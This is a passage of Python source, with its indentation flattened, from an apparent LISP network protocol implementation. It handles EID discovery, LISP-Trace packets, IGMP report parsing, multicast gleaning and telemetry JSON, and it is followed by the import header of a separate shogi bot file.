iid = int(msg["instance-id"])
if (iid == -1): return
else:
iid = lisp_get_interface_instance_id(device, None)
#endif
#
# Validate EID format.
#
seid = None
if ("source-eid" in msg):
source_eid = msg["source-eid"]
seid = lisp_address(LISP_AFI_NONE, source_eid, 0, iid)
if (seid.is_null()):
lprint("Invalid source-EID format '{}'".format(source_eid))
return
#endif
#endif
deid = None
if ("dest-eid" in msg):
dest_eid = msg["dest-eid"]
deid = lisp_address(LISP_AFI_NONE, dest_eid, 0, iid)
if (deid.is_null()):
lprint("Invalid dest-EID format '{}'".format(dest_eid))
return
#endif
#endif
#
# Do source-EID discovery.
#
# Make sure we have a configured database-mapping entry for this EID.
#
if (seid):
e = green(seid.print_address(), False)
db = lisp_db_for_lookups.lookup_cache(seid, False)
if (db != None):
#
# Check accept policy and if accepted, discover EID by putting
# in discovery cache. ETR will register it.
#
if (db.dynamic_eid_configured()):
interface = lisp_allow_dynamic_eid(device, seid)
if (interface != None and lisp_i_am_itr):
lisp_itr_discover_eid(db, seid, device, interface)
else:
lprint(("Disallow dynamic source-EID {} " + \
"on interface {}").format(e, device))
#endif
#endif
else:
lprint("Punt from non-EID source {}".format(e))
#endif
#endif
#
# Do Map-Request processing on destination.
#
if (deid):
mc = lisp_map_cache_lookup(seid, deid)
if (mc == None or lisp_mr_or_pubsub(mc.action)):
#
# Check if we should rate-limit Map-Request and if not send
# Map-Request.
#
if (lisp_rate_limit_map_request(deid)): return
pubsub = (mc and mc.action == LISP_SEND_PUBSUB_ACTION)
lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
seid, deid, None, pubsub)
else:
e = green(deid.print_address(), False)
lprint("Map-cache entry for {} already exists".format(e))
#endif
#endif
return
#enddef
#
# lisp_ipc_map_cache_entry
#
# Callback from class lisp_cache.walk_cache().
#
def lisp_ipc_map_cache_entry(mc, jdata):
entry = lisp_write_ipc_map_cache(True, mc, dont_send=True)
jdata.append(entry)
return([True, jdata])
#enddef
#
# lisp_ipc_walk_map_cache
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_ipc_walk_map_cache(mc, jdata):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_ipc_map_cache_entry(mc, jdata))
if (mc.source_cache == None): return([True, jdata])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
jdata = mc.source_cache.walk_cache(lisp_ipc_map_cache_entry, jdata)
return([True, jdata])
#enddef
#
# lisp_itr_discover_eid
#
# Put dynamic-EID in db.dynamic_eids{} array.
#
def lisp_itr_discover_eid(db, eid, input_interface, routed_interface,
lisp_ipc_listen_socket):
eid_str = eid.print_address()
if (eid_str in db.dynamic_eids):
db.dynamic_eids[eid_str].last_packet = lisp_get_timestamp()
return
#endif
#
# Add to list.
#
dyn_eid = lisp_dynamic_eid()
dyn_eid.dynamic_eid.copy_address(eid)
dyn_eid.interface = routed_interface
dyn_eid.last_packet = lisp_get_timestamp()
dyn_eid.get_timeout(routed_interface)
db.dynamic_eids[eid_str] = dyn_eid
routed = ""
if (input_interface != routed_interface):
routed = ", routed-interface " + routed_interface
#endif
eid_string = green(eid_str, False) + bold(" discovered", False)
lprint("Dynamic-EID {} on interface {}{}, timeout {}".format( \
eid_string,input_interface, routed, dyn_eid.timeout))
#
# Tell ETR process so it can register dynamic-EID.
#
ipc = "learn%{}%{}".format(eid_str, routed_interface)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_listen_socket, "lisp-etr")
return
#enddef
#
# lisp_retry_decap_keys
#
# A decap-key was copied from x.x.x.x:p to x.x.x.x, but it was the wrong one.
# Copy x.x.x.x.q to x.x.x.x. This is an expensive function. But it is hardly
# used. And once it is used for a particular addr_str, it shouldn't be used
# again.
#
# This function is only used when an ICV error occurs when x.x.x.x is the
# crypto-key used.
#
def lisp_retry_decap_keys(addr_str, packet, iv, packet_icv):
if (lisp_search_decap_keys == False): return
#
# Only use this function when the key matched was not port based.
#
if (addr_str.find(":") != -1): return
parent = lisp_crypto_keys_by_rloc_decap[addr_str]
for key in lisp_crypto_keys_by_rloc_decap:
#
# Find entry that has same source RLOC.
#
if (key.find(addr_str) == -1): continue
#
# Skip over parent entry.
#
if (key == addr_str): continue
#
# If crypto-keys the same, go to find next one.
#
entry = lisp_crypto_keys_by_rloc_decap[key]
if (entry == parent): continue
#
# Try ICV check. If works, then go to this key.
#
crypto_key = entry[1]
if (packet_icv != crypto_key.do_icv(packet, iv)):
lprint("Test ICV with key {} failed".format(red(key, False)))
continue
#endif
lprint("Changing decap crypto key to {}".format(red(key, False)))
lisp_crypto_keys_by_rloc_decap[addr_str] = entry
#endif
return
#enddef
#
# lisp_decent_pull_xtr_configured
#
# Return True if configured LISP-Decent modulus is not 0. Meaning we are using
# the LISP-Decent pull-based mapping system.
#
def lisp_decent_pull_xtr_configured():
return(lisp_decent_modulus != 0 and lisp_decent_dns_suffix != None)
#enddef
#
# lisp_is_decent_dns_suffix
#
# Return True if supplied DNS name ends with a configured LISP-Decent DNS
# suffix.
#
def lisp_is_decent_dns_suffix(dns_name):
if (lisp_decent_dns_suffix == None): return(False)
name = dns_name.split(".")
name = ".".join(name[1::])
return(name == lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_index
#
# Hash the EID-prefix and mod the configured LISP-Decent modulus value. We
# do a sha256() over a string representation of "[<iid>]<eid>", take the
# high-order 6 bytes from the hash and do the modulus on that value.
#
# The seed/password for the sha256 hash is string "".
#
def lisp_get_decent_index(eid):
eid_str = eid.print_prefix()
hash_value = hmac.new(b"lisp-decent", eid_str, hashlib.sha256).hexdigest()
#
# Get hash-length to modulate from LISP_DECENT_HASH_WIDTH in bytes.
#
hash_width = os.getenv("LISP_DECENT_HASH_WIDTH")
if (hash_width in ["", None]):
hash_width = 12
else:
hash_width = int(hash_width)
if (hash_width > 32):
hash_width = 12
else:
hash_width *= 2
#endif
#endif
mod_value = hash_value[0:hash_width]
index = int(mod_value, 16) % lisp_decent_modulus
lprint("LISP-Decent modulus {}, hash-width {}, mod-value {}, index {}". \
format(lisp_decent_modulus, old_div(hash_width, 2) , mod_value, index))
return(index)
#enddef
#
# lisp_get_decent_dns_name
#
# Based on EID, get index and prepend to LISP-Decent DNS name suffix.
#
def lisp_get_decent_dns_name(eid):
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_dns_name_from_str
#
# Supplied source and group are addresses passed as strings. Build in internal
# lisp_address() to pass into lisp_get_decent_index().
#
def lisp_get_decent_dns_name_from_str(iid, eid_str):
eid = lisp_address(LISP_AFI_NONE, eid_str, 0, iid)
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_trace_append
#
# Append JSON data to trace packet. If this is the ETR, the EIDs will be
# swapped to return packet to originator.
#
# Returning False means the caller should return (and not forward the packet).
#
def lisp_trace_append(packet, reason=None, ed="encap", lisp_socket=None,
rloc_entry=None):
offset = 28 if packet.inner_version == 4 else 48
trace_pkt = packet.packet[offset::]
trace = lisp_trace()
if (trace.decode(trace_pkt) == False):
lprint("Could not decode JSON portion of a LISP-Trace packet")
return(False)
#endif
next_rloc = "?" if packet.outer_dest.is_null() else \
packet.outer_dest.print_address_no_iid()
#
# Display port if in this call is a encapsulating RTR using a translated
# RLOC.
#
if (next_rloc != "?" and packet.encap_port != LISP_DATA_PORT):
if (ed == "encap"): next_rloc += ":{}".format(packet.encap_port)
#endif
#
# Add node entry data for the encapsulation or decapsulation.
#
entry = {}
entry["n"] = "ITR" if lisp_i_am_itr else "ETR" if lisp_i_am_etr else \
"RTR" if lisp_i_am_rtr else "?"
srloc = packet.outer_source
if (srloc.is_null()): srloc = lisp_myrlocs[0]
entry["sr"] = srloc.print_address_no_iid()
#
# In the source RLOC include the ephemeral port number of the ltr client
# so RTRs can return errors to the client behind a NAT.
#
if (entry["n"] == "ITR" and packet.inner_sport != LISP_TRACE_PORT):
entry["sr"] += ":{}".format(packet.inner_sport)
#endif
entry["hn"] = lisp_hostname
key = ed[0] + "ts"
entry[key] = lisp_get_timestamp()
#
# If this is a ETR decap entry and the drloc is "?", the packet came in on
# lisp_etr_nat_data_plane() where the kernel strips the outer header. Get
# the local/private RLOC from our database-mapping.
#
if (next_rloc == "?" and entry["n"] == "ETR"):
db = lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
if (db != None and len(db.rloc_set) >= 1):
next_rloc = db.rloc_set[0].rloc.print_address_no_iid()
#endif
#endif
entry["dr"] = next_rloc
#
# If there is a reason there is no dest RLOC, include it.
#
if (next_rloc == "?" and reason != None):
entry["dr"] += " ({})".format(reason)
#endif
#
# Add recent-rtts, recent-hops, and recent-latencies.
#
if (rloc_entry != None):
entry["rtts"] = rloc_entry.recent_rloc_probe_rtts
entry["hops"] = rloc_entry.recent_rloc_probe_hops
entry["lats"] = rloc_entry.recent_rloc_probe_latencies
#endif
#
# Build seid->deid record if it does not exist. Then append node entry
# to record below, in the search loop.
#
seid = packet.inner_source.print_address()
deid = packet.inner_dest.print_address()
if (trace.packet_json == []):
rec = {}
rec["se"] = seid
rec["de"] = deid
rec["paths"] = []
trace.packet_json.append(rec)
#endif
#
# Search for record. If we appending the first ITR node entry, get its
# RLOC address in case we have to return-to-sender.
#
for rec in trace.packet_json:
if (rec["de"] != deid): continue
rec["paths"].append(entry)
break
#endfor
#
# If we are destination-EID, add a new record deid->seid if we have not
# completed a round-trip. The ETR will deliver this packet from its own
# EID which means the co-located ITR will pcap the packet and add its
# encap node entry.
#
swap = False
if (len(trace.packet_json) == 1 and entry["n"] == "ETR" and
trace.myeid(packet.inner_dest)):
rec = {}
rec["se"] = deid
rec["de"] = seid
rec["paths"] = []
trace.packet_json.append(rec)
swap = True
#endif
#
# Print the JSON packet after we appended data to it. Put the new JSON in
# packet. Fix up lengths and checksums from inner headers.
#
trace.print_trace()
trace_pkt = trace.encode()
#
# If next_rloc is not known, we need to return packet to sender.
#
# Otherwise we are forwarding a packet that is about to encapsulated or we
# are forwarding a packet that was just decapsulated with the addresses
# swapped so we can turn it around.
#
sender_rloc = trace.packet_json[0]["paths"][0]["sr"]
if (next_rloc == "?"):
lprint("LISP-Trace return to sender RLOC {}".format(sender_rloc))
trace.return_to_sender(lisp_socket, sender_rloc, trace_pkt)
return(False)
#endif
#
# Compute length of trace packet. This includes the UDP header, Trace
# header, and JSON payload.
#
udplen = trace.packet_length()
#
# Fix up UDP length and recompute UDP checksum if IPv6 packet, zero
# otherwise. Only do checksum when the Trace went round-trip and this is
# the local ETR delivery EID-based Trace packet to the client ltr.
#
headers = packet.packet[0:offset]
p = struct.pack("HH", socket.htons(udplen), 0)
headers = headers[0:offset-4] + p
if (packet.inner_version == 6 and entry["n"] == "ETR" and
len(trace.packet_json) == 2):
udp = headers[offset-8::] + trace_pkt
udp = lisp_udp_checksum(seid, deid, udp)
headers = headers[0:offset-8] + udp[0:8]
#endif
#
# If we are swapping addresses, do it here so the JSON append and IP
# header fields changes are all reflected in new IPv4 header checksum.
#
# Clear the DF-bit because we may have to fragment as the packet is going
# to grow with trace data.
#
if (swap):
if (packet.inner_version == 4):
headers = headers[0:12] + headers[16:20] + headers[12:16] + \
headers[22:24] + headers[20:22] + headers[24::]
else:
headers = headers[0:8] + headers[24:40] + headers[8:24] + \
headers[42:44] + headers[40:42] + headers[44::]
#endif
d = packet.inner_dest
packet.inner_dest = packet.inner_source
packet.inner_source = d
# df_flags = struct.unpack("B", headers[6:7])[0] & 0xbf
# headers = headers[0:6] + struct.pack("B", df_flags) + headers[7::]
#endif
#
# Fix up IP length.
#
offset = 2 if packet.inner_version == 4 else 4
iplen = 20 + udplen if packet.inner_version == 4 else udplen
h = struct.pack("H", socket.htons(iplen))
headers = headers[0:offset] + h + headers[offset+2::]
#
# Fix up IPv4 header checksum.
#
if (packet.inner_version == 4):
c = struct.pack("H", 0)
headers = headers[0:10] + c + headers[12::]
h = lisp_ip_checksum(headers[0:20])
headers = h + headers[20::]
#endif
#
# Caller is forwarding packet, either as an ITR, RTR, or ETR.
#
packet.packet = headers + trace_pkt
return(True)
#enddef
#
# lisp_allow_gleaning
#
# Check the lisp_glean_mapping array to see if we should glean the EID and
# RLOC. Find first match. Return False if there are no configured glean
# mappings. The second return value is either True or False depending if the
# matched entry was configured to RLOC-probe the RLOC for the gleaned entry.
#
def lisp_allow_gleaning(eid, group, rloc):
if (lisp_glean_mappings == []): return(False, False, False)
for entry in lisp_glean_mappings:
if ("instance-id" in entry):
iid = eid.instance_id
low, high = entry["instance-id"]
if (iid < low or iid > high): continue
#endif
if ("eid-prefix" in entry):
e = copy.deepcopy(entry["eid-prefix"])
e.instance_id = eid.instance_id
if (eid.is_more_specific(e) == False): continue
#endif
if ("group-prefix" in entry):
if (group == None): continue
g = copy.deepcopy(entry["group-prefix"])
g.instance_id = group.instance_id
if (group.is_more_specific(g) == False): continue
#endif
if ("rloc-prefix" in entry):
if (rloc != None and rloc.is_more_specific(entry["rloc-prefix"])
== False): continue
#endif
return(True, entry["rloc-probe"], entry["igmp-query"])
#endfor
return(False, False, False)
#enddef
#
# lisp_build_gleaned_multicast
#
# Build (*,G) map-cache entry in RTR with gleaned RLOC info from IGMP report.
#
def lisp_build_gleaned_multicast(seid, geid, rloc, port, igmp):
group_str = geid.print_address()
seid_name = seid.print_address_no_iid()
s = green("{}".format(seid_name), False)
e = green("(*, {})".format(group_str), False)
r = red(rloc.print_address_no_iid() + ":" + str(port), False)
#
# Support (*,G) only gleaning. Scales better anyway.
#
mc = lisp_map_cache_lookup(seid, geid)
if (mc == None):
mc = lisp_mapping("", "", [])
mc.group.copy_address(geid)
mc.eid.copy_address(geid)
mc.eid.address = 0
mc.eid.mask_len = 0
mc.mapping_source.copy_address(rloc)
mc.map_cache_ttl = LISP_IGMP_TTL
mc.gleaned = True
mc.add_cache()
lprint("Add gleaned EID {} to map-cache".format(e))
#endif
#
# Check to see if RLE node exists. If so, update the RLE node RLOC and
# encap-port.
#
rloc_entry = rle_entry = rle_node = None
if (mc.rloc_set != []):
rloc_entry = mc.rloc_set[0]
if (rloc_entry.rle):
rle_entry = rloc_entry.rle
for rn in rle_entry.rle_nodes:
if (rn.rloc_name != seid_name): continue
rle_node = rn
break
#endfor
#endif
#endif
#
# Adding RLE to existing rloc-set or create new one.
#
if (rloc_entry == None):
rloc_entry = lisp_rloc()
mc.rloc_set = [rloc_entry]
rloc_entry.priority = 253
rloc_entry.mpriority = 255
mc.build_best_rloc_set()
#endif
if (rle_entry == None):
rle_entry = lisp_rle(geid.print_address())
rloc_entry.rle = rle_entry
#endif
if (rle_node == None):
rle_node = lisp_rle_node()
rle_node.rloc_name = seid_name
rle_entry.rle_nodes.append(rle_node)
rle_entry.build_forwarding_list()
lprint("Add RLE {} from {} for gleaned EID {}".format(r, s, e))
elif (rloc.is_exact_match(rle_node.address) == False or
port != rle_node.translated_port):
lprint("Changed RLE {} from {} for gleaned EID {}".format(r, s, e))
#endif
#
# Add or update.
#
rle_node.store_translated_rloc(rloc, port)
#
# An IGMP report was received. Update timestamp so we don't time out
# actively joined groups.
#
if (igmp):
seid_str = seid.print_address()
if (seid_str not in lisp_gleaned_groups):
lisp_gleaned_groups[seid_str] = {}
#endif
lisp_gleaned_groups[seid_str][group_str] = lisp_get_timestamp()
#endif
#enddef
#
# lisp_remove_gleaned_multicast
#
# Remove an RLE from a gleaned entry since an IGMP Leave message was received.
#
def lisp_remove_gleaned_multicast(seid, geid):
#
# Support (*,G) only gleaning. Scales better anyway.
#
mc = lisp_map_cache_lookup(seid, geid)
if (mc == None): return
rle = mc.rloc_set[0].rle
if (rle == None): return
rloc_name = seid.print_address_no_iid()
found = False
for rle_node in rle.rle_nodes:
if (rle_node.rloc_name == rloc_name):
found = True
break
#endif
#endfor
if (found == False): return
#
# Found entry to remove.
#
rle.rle_nodes.remove(rle_node)
rle.build_forwarding_list()
group_str = geid.print_address()
seid_str = seid.print_address()
s = green("{}".format(seid_str), False)
e = green("(*, {})".format(group_str), False)
lprint("Gleaned EID {} RLE removed for {}".format(e, s))
#
# Remove that EID has joined the group.
#
if (seid_str in lisp_gleaned_groups):
if (group_str in lisp_gleaned_groups[seid_str]):
lisp_gleaned_groups[seid_str].pop(group_str)
#endif
#endif
#
# Remove map-cache entry if no more RLEs present.
#
if (rle.rle_nodes == []):
mc.delete_cache()
lprint("Gleaned EID {} remove, no more RLEs".format(e))
#endif
#enddef
#
# lisp_change_gleaned_multicast
#
# Change RLOC for each gleaned group this EID has joined.
#
def lisp_change_gleaned_multicast(seid, rloc, port):
seid_str = seid.print_address()
if (seid_str not in lisp_gleaned_groups): return
for group in lisp_gleaned_groups[seid_str]:
lisp_geid.store_address(group)
lisp_build_gleaned_multicast(seid, lisp_geid, rloc, port, False)
#endfor
#enddef
#
# lisp_process_igmp_packet
#
# Process IGMP packets.
#
# Basically odd types are Joins and even types are Leaves.
#
#
# An IGMPv1 and IGMPv2 report format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Version| Type | Unused | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Group Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# An IGMPv3 report format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 0x22 | Reserved | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Number of Group Records (M) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [1] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [2] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . |
# . . .
# | . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [M] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# An IGMPv3 group record format is:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record Type | Aux Data Len | Number of Sources (N) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Multicast Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source Address [1] |
# +- -+
# | Source Address [2] |
# +- -+
# . . .
# . . .
# . . .
# +- -+
# | Source Address [N] |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Auxiliary Data .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
#
# The function returns a boolean (True) when packet is an IGMP query and
# an array when it is a report. Caller must check where there is context
# to deal with IGMP queries.
#
# IMPORTANT NOTE: for encapsulated IGMP Queries to be forwarded correctly
# after the ETR decapsulates them, you need this in the kernel (put this
# statement in the RL script):
#
# ip route add 224.0.0.1/32 dev lo
#
# For OOR runnnig as a LISP-MN use:
#
# ip route add 224.0.0.1/32 dev utun4
#
igmp_types = { 17 : "IGMP-query", 18 : "IGMPv1-report", 19 : "DVMRP",
20 : "PIMv1", 22 : "IGMPv2-report", 23 : "IGMPv2-leave",
30 : "mtrace-response", 31 : "mtrace-request", 34 : "IGMPv3-report" }
lisp_igmp_record_types = { 1 : "include-mode", 2 : "exclude-mode",
3 : "change-to-include", 4 : "change-to-exclude", 5 : "allow-new-source",
6 : "block-old-sources" }
def lisp_process_igmp_packet(packet):
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
source = bold("from {}".format(source.print_address_no_iid()), False)
r = bold("Receive", False)
lprint("{} {}-byte {}, IGMP packet: {}".format(r, len(packet), source,
lisp_format_packet(packet)))
#
# Jump over IP header.
#
header_offset = (struct.unpack("B", packet[0:1])[0] & 0x0f) * 4
#
# Check for IGMPv3 type value 0x22. Or process an IGMPv2 report.
#
igmp = packet[header_offset::]
igmp_type = struct.unpack("B", igmp[0:1])[0]
#
# Maybe this is an IGMPv1 or IGMPv2 message so get group address. If
# IGMPv3, we will fix up group address in loop (for each group record).
#
group = lisp_address(LISP_AFI_IPV4, "", 32, 0)
group.address = socket.ntohl(struct.unpack("II", igmp[:8])[1])
group_str = group.print_address_no_iid()
if (igmp_type == 17):
lprint("IGMP Query for group {}".format(group_str))
return(True)
#endif
reports_and_leaves_only = (igmp_type in (0x12, 0x16, 0x17, 0x22))
if (reports_and_leaves_only == False):
igmp_str = "{} ({})".format(igmp_type, igmp_types[igmp_type]) if \
(igmp_type in igmp_types) else igmp_type
lprint("IGMP type {} not supported".format(igmp_str))
return([])
#endif
if (len(igmp) < 8):
lprint("IGMP message too small")
return([])
#endif
#
# Process either IGMPv1 or IGMPv2 and exit.
#
if (igmp_type == 0x17):
lprint("IGMPv2 leave (*, {})".format(bold(group_str, False)))
return([[None, group_str, False]])
#endif
if (igmp_type in (0x12, 0x16)):
lprint("IGMPv{} join (*, {})".format( \
1 if (igmp_type == 0x12) else 2, bold(group_str, False)))
#
# Suppress for link-local groups.
#
if (group_str.find("224.0.0.") != -1):
lprint("Suppress registration for link-local groups")
else:
return([[None, group_str, True]])
#endif
#
# Finished with IGMPv1 or IGMPv2 processing.
#
return([])
#endif
#
# Parse each record for IGMPv3 (igmp_type == 0x22).
#
record_count = group.address
igmp = igmp[8::]
group_format = "BBHI"
group_size = struct.calcsize(group_format)
source_format = "I"
source_size = struct.calcsize(source_format)
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
#
# Traverse each group record.
#
register_entries = []
for i in range(record_count):
if (len(igmp) < group_size): return
record_type, x, source_count, address = struct.unpack(group_format,
igmp[:group_size])
igmp = igmp[group_size::]
if (record_type not in lisp_igmp_record_types):
lprint("Invalid record type {}".format(record_type))
continue
#endif
record_type_str = lisp_igmp_record_types[record_type]
source_count = socket.ntohs(source_count)
group.address = socket.ntohl(address)
group_str = group.print_address_no_iid()
lprint("Record type: {}, group: {}, source-count: {}".format( \
record_type_str, group_str, source_count))
#
# Determine if this is a join or leave. MODE_IS_INCLUDE (1) is a join.
# MODE_TO_EXCLUDE (4) with no sources is a join. CHANGE_TO_INCLUDE (5)
# is a join. Everything else is a leave.
#
joinleave = False
if (record_type in (1, 5)): joinleave = True
if (record_type in (2, 4) and source_count == 0): joinleave = True
j_or_l = "join" if (joinleave) else "leave"
#
# Suppress registration for link-local groups.
#
if (group_str.find("224.0.0.") != -1):
lprint("Suppress registration for link-local groups")
continue
#endif
#
# (*,G) Join or Leave has been received if source count is 0.
#
# If this is IGMPv2 or just IGMPv3 reporting a group address, encode
# a (*,G) for the element in the register_entries array.
#
if (source_count == 0):
register_entries.append([None, group_str, joinleave])
lprint("IGMPv3 {} (*, {})".format(bold(j_or_l, False),
bold(group_str, False)))
#endif
#
# Process (S,G)s (source records)..
#
for j in range(source_count):
if (len(igmp) < source_size): return
address = struct.unpack(source_format, igmp[:source_size])[0]
source.address = socket.ntohl(address)
source_str = source.print_address_no_iid()
register_entries.append([source_str, group_str, joinleave])
lprint("{} ({}, {})".format(j_or_l,
green(source_str, False), bold(group_str, False)))
igmp = igmp[source_size::]
#endfor
#endfor
#
# Return (S,G) entries to return to call to send a Map-Register.
# They are put in a multicast Info LCAF Type with ourselves as an RLE.
# This is spec'ed in RFC 8378.
#
return(register_entries)
#enddef
#
# lisp_glean_map_cache
#
# Add or update a gleaned EID/RLOC to the map-cache. This function will do
# this for the source EID of a packet and IGMP reported groups with one call.
#
lisp_geid = lisp_address(LISP_AFI_IPV4, "", 32, 0)
def lisp_glean_map_cache(seid, rloc, encap_port, igmp):
#
# First do lookup to see if EID is in map-cache. Check to see if RLOC
# or encap-port needs updating. If not, return. Set refresh timer since
# we received a packet from the source gleaned EID.
#
rloc_change = True
mc = lisp_map_cache.lookup_cache(seid, True)
if (mc and len(mc.rloc_set) != 0):
mc.last_refresh_time = lisp_get_timestamp()
cached_rloc = mc.rloc_set[0]
orloc = cached_rloc.rloc
oport = cached_rloc.translated_port
rloc_change = (orloc.is_exact_match(rloc) == False or
oport != encap_port)
if (rloc_change):
e = green(seid.print_address(), False)
r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
lprint("Change gleaned EID {} to RLOC {}".format(e, r))
cached_rloc.delete_from_rloc_probe_list(mc.eid, mc.group)
lisp_change_gleaned_multicast(seid, rloc, encap_port)
#endif
else:
mc = lisp_mapping("", "", [])
mc.eid.copy_address(seid)
mc.mapping_source.copy_address(rloc)
mc.map_cache_ttl = LISP_GLEAN_TTL
mc.gleaned = True
e = green(seid.print_address(), False)
r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
lprint("Add gleaned EID {} to map-cache with RLOC {}".format(e, r))
mc.add_cache()
#endif
#
# Adding RLOC to new map-cache entry or updating RLOC for existing entry..
#
if (rloc_change):
rloc_entry = lisp_rloc()
rloc_entry.store_translated_rloc(rloc, encap_port)
rloc_entry.add_to_rloc_probe_list(mc.eid, mc.group)
rloc_entry.priority = 253
rloc_entry.mpriority = 255
rloc_set = [rloc_entry]
mc.rloc_set = rloc_set
mc.build_best_rloc_set()
#endif
#
# Unicast gleaning only.
#
if (igmp == None): return
#
# Process IGMP report. For each group, put in map-cache with gleaned
# source RLOC and source port.
#
lisp_geid.instance_id = seid.instance_id
#
# Add (S,G) or (*,G) to map-cache. Do not do lookup in group-mappings.
# The lisp-etr process will do this.
#
entries = lisp_process_igmp_packet(igmp)
if (type(entries) == bool): return
for source, group, joinleave in entries:
if (source != None): continue
#
# Does policy allow gleaning for this joined multicast group.
#
lisp_geid.store_address(group)
allow, x, y = lisp_allow_gleaning(seid, lisp_geid, rloc)
if (allow == False): continue
if (joinleave):
lisp_build_gleaned_multicast(seid, lisp_geid, rloc, encap_port,
True)
else:
lisp_remove_gleaned_multicast(seid, lisp_geid)
#endif
#endfor
#enddef
#
# lisp_is_json_telemetry
#
# Return dictionary arraay if json string has the following two key/value
# pairs in it. Otherwise, return None.
#
# { "type" : "telemetry", "sub-type" : "timestamps" }
#
def lisp_is_json_telemetry(json_string):
try:
tel = json.loads(json_string)
if (type(tel) != dict): return(None)
except:
lprint("Could not decode telemetry json: {}".format(json_string))
return(None)
#endtry
if ("type" not in tel): return(None)
if ("sub-type" not in tel): return(None)
if (tel["type"] != "telemetry"): return(None)
if (tel["sub-type"] != "timestamps"): return(None)
return(tel)
#enddef
#
# lisp_encode_telemetry
#
# Take json string:
#
# { "type" : "telemetry", "sub-type" : "timestamps", "itr-out" : "?",
# "etr-in" : "?", "etr-out" : "?", "itr-in" : "?" }
#
# And fill in timestamps for the 4 fields. Input to this function is a string.
#
def lisp_encode_telemetry(json_string, ii="?", io="?", ei="?", eo="?"):
tel = lisp_is_json_telemetry(json_string)
if (tel == None): return(json_string)
if (tel["itr-in"] == "?"): tel["itr-in"] = ii
if (tel["itr-out"] == "?"): tel["itr-out"] = io
if (tel["etr-in"] == "?"): tel["etr-in"] = ei
if (tel["etr-out"] == "?"): tel["etr-out"] = eo
json_string = json.dumps(tel)
return(json_string)
#enddef
#
# lisp_decode_telemetry
#
# Take json string:
#
# { "type" : "telemetry", "sub-type" : "timestamps", "itr-out" : "?",
# "etr-in" : "?", "etr-out" : "?", "itr-in" : "?" }
#
# And return values in a dictionary array. Input to this function is a string.
#
def lisp_decode_telemetry(json_string):
tel = lisp_is_json_telemetry(json_string)
if (tel == None): return({})
return(tel)
#enddef
#
# lisp_telemetry_configured
#
# Return JSON string template of telemetry data if it has been configured.
# If it has been configured we'll find a "lisp json" command with json-name
# "telemetry". If found, return the json string. Otherwise, return None.
#
def lisp_telemetry_configured():
if ("telemetry" not in lisp_json_list): return(None)
json_string = lisp_json_list["telemetry"].json_string
if (lisp_is_json_telemetry(json_string) == None): return(None)
return(json_string)
#enddef
#
# lisp_mr_or_pubsub
#
# Test action for Map-Request or Map-Request with Subscribe bit set.
#
def lisp_mr_or_pubsub(action):
return(action in [LISP_SEND_MAP_REQUEST_ACTION, LISP_SEND_PUBSUB_ACTION])
#enddef
#------------------------------------------------------------------------------
|
lishogibot.py
|
import argparse
import shogi
import engine_wrapper
import model
import json
import lishogi
import logging
import multiprocessing
from multiprocessing import Process
import traceback
import logging_pool
import signal
import sys
import time
import backoff
import threading
from config import load_config
from conversation import Conversation, ChatLine
from functools import partial
